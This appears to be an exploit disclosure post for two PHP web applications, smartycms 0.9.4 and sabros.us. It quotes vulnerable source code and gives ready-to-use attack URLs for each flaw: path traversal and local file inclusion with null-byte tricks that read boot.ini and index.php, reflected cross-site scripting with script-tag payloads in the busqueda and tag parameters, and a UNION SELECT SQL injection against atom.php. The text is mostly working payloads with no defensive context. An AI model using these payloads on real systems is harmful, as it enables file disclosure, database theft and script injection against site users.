http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=../../../../../../../../../../boot.ini%00 http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/symbols.php?lang=../../../../../../../../../../boot.ini%00 ---------------- config/smartycms.config.php PHP: // url request param name for template call $smartycms['config']['PageCallParamName'] = 'page'; libraries/smarty-cms/Smarty_cms.php PHP: // read default template name from given url param if (!$resource_name && !empty($smartycms['config']['PageCallParamName'])) if ( !empty($_REQUEST[$smartycms['config']['PageCallParamName']]) ) { $page = $_REQUEST[$smartycms['config']['PageCallParamName']]; $ext = strrchr($page, '.'); if($ext !== false) $resource_name = substr($page, 0, -strlen($ext)); else $resource_name = $page; $resource_name .= '.'.$smartycms['config']['TemplateFileExtension']; } libraries/smarty/Smarty.class.php PHP: if ($display && !$this->caching && count($this->_plugins['outputfilter']) == 0) { if ($this->_is_compiled($resource_name, $_smarty_compile_path) || $this->_compile_resource($resource_name, $_smarty_compile_path)) { 
include($_smarty_compile_path); } LFI mq=off http://localhost/smartycms-0.9.4-334/index.php?page=/boot.ini%00.html ---------------- templates/handler/book_content_handler.php PHP: function book_content_handler($params, &$smarty) { global $smartycms; // create individual chapter id if (!$_GET['chapterid'] || $_GET['chapterid']=="1") $chapterid=time(); else $chapterid=$_GET['chapterid']; // send content to template $smarty->assign("chapterid",$chapterid); $smarty->assign("book_chapter_id","book_chapter_".$chapterid); $smarty->assign("book_content_id","book_content_".$chapterid); } templates/tutorial.tpl PHP: {* Tutorial content block *} {include file="modules/book_content.tpl" pid="smartycms_tutorial"}<br> templates/modules/book_content.tpl PHP: {if $smarty.request.chapterid} <a name="start"></a> <div class="cms_book_headline">{cms id="$book_chapter_id" theme="singleline" pid=$pid title="edit chapter headline"}Please insert here the chapter headline{/cms}</div><br> {cms id="$book_content_id" pid=$pid title="edit chapter content" height="250" smartytags="0"}<div class="cms_book_bodytext">Please insert here the chapter content</div>{/cms}<br><br> {/if} view source http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&chapterid=../../../../../../../../../../boot.ini http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&chapterid=../../../../../index.php
cms sabros.us http://sourceforge.net/projects/sabrosus/files/latest pXSS http://localhost/sabrosus/index.php?busqueda=1<ScRiPt >alert(1212);</ScRiPt> http://localhost/sabrosus/index.php?tag=1>"><ScRiPt>alert(1212);</ScRiPt> ------------ atom.php PHP: if (isset($_GET["tag"])) { $navegador = strtolower( $_SERVER['HTTP_USER_AGENT'] ); if (stristr($navegador, "opera") || stristr($navegador, "msie")) { $tagtag = utf8_decode($_GET["tag"]); } else { $tagtag = $_GET["tag"]; } } $sqlStr = "SELECT DISTINCT link.* FROM ".$prefix."sabrosus as link, ".$prefix."tags as tag, ".$prefix."linktags as rel WHERE"; if(isset($tagtag)){ $sqlStr .= " (tag.tag LIKE '$tagtag') AND "; } $sqlStr .= " (tag.id = rel.tag_id AND rel.link_id = link.id_enlace) AND link.privado = 0 ORDER BY link.fecha DESC"; if(isset($cuantos)){ if($cuantos!='todos' && is_numeric($cuantos)){ $sqlStr .= " LIMIT $cuantos"; } if($cuantos!='todos' && !is_numeric($cuantos)){ $sqlStr .= " LIMIT 10"; } } else { $sqlStr .= " LIMIT 10"; } $result = mysql_query($sqlStr,$link); SQL mq=off http://localhost/sabrosus/atom.php?tag=')+union+select+1,version(),3,4,5,6+--+ User-Agent=111